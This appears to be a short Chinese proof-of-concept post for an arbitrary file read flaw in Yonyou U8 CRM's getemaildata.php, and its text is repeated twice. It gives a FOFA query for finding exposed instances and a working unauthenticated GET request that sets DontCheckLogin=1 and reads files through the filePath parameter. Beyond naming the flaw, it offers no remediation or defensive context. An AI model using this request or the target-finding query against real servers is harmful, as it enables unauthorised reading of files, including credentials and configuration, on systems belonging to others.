用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件上传和任意文件读取漏洞,本文 只复现 任意文件读取。
fofa大法:
body="用友U8CRM"
http://x.x.x.x:9072/login/login.php
poc:burp 抓包 get 请求 GET /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini 替换即可
用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件上传和任意文件读取漏洞,本文 只复现 任意文件读取。
fofa大法:
body="用友U8CRM"
http://x.x.x.x:9072/login/login.php
poc:burp 抓包 get 请求 GET /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini 替换即可